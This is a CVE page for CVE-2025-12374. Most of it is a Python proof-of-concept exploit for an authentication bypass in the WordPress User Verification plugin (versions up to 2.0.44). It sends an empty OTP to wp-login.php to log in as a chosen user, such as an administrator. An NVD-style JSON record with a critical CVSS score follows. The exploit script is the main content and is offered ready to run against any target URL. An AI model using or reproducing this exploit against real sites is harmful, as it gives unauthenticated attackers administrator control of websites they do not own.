CVE-2025-12374

import requests import re # CVE-2025-12374 PoC - WordPress User Verification Plugin Authentication Bypass # Target: WordPress site with User Verification plugin <= 2.0.44 def exploit_auth_bypass(target_url, target_email): """ Exploit the authentication bypass vulnerability in User Verification plugin. The vulnerability allows attackers to bypass OTP verification by submitting an empty OTP value. Args: target_url: Base URL of the WordPress site target_email: Email address of a verified user (e.g., admin) Returns: Boolean indicating if exploitation was successful """ # Step 1: Identify the OTP login endpoint login_endpoint = f"{target_url.rstrip('/')}/wp-login.php" # Step 2: Prepare the malicious request with empty OTP # The vulnerability is in the OTP validation logic that doesn't check # if OTP was actually generated before comparing payload = { 'user_verification_otp_login': '1', 'user_email': target_email, 'user_otp': '', # Empty OTP bypasses authentication 'redirect_to': '/wp-admin/', } try: # Step 3: Send the authentication bypass request response = requests.post( login_endpoint, data=payload, allow_redirects=False, timeout=30 ) # Step 4: Check for successful authentication # Successful bypass typically results in redirect to admin area if response.status_code in [301, 302, 303] and 'wp-admin' in response.headers.get('Location', ''): print(f"[+] Authentication bypass successful!") print(f"[+] Logged in as: {target_email}") print(f"[+] Redirect location: {response.headers.get('Location')}") return True # Alternative check: Look for auth cookies or success indicators if 'wordpress_logged_in' in str(response.cookies): print(f"[+] Authentication bypass successful!") return True print(f"[-] Authentication bypass failed") print(f"[-] Status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Example usage if __name__ == "__main__": target = "http://target-wordpress-site.com" admin_email = "[email protected]" exploit_auth_bypass(target, admin_email)

{"cve": {"id": "CVE-2025-12374", "sourceIdentifier": "[email protected]", "published": "2025-12-05T07:16:11.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Email Verification, Email OTP, Block Spam Email, Passwordless login, Hide Login, Magic Login – User Verification plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.0.44. This is due to the plugin not properly validating that an OTP was generated before comparing it to user input in the \"user_verification_form_wrap_process_otpLogin\" function. This makes it possible for unauthenticated attackers to log in as any user with a verified email address, such as an administrator, by submitting an empty OTP value."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/user-verification/trunk/templates/email-otp-login-form/hook.php#L141", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442150%40user-verification&new=3442150%40user-verification&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ccb1304-326e-43af-b75d-23874f92ba8b?source=cve", "source": "[email protected]"}]}}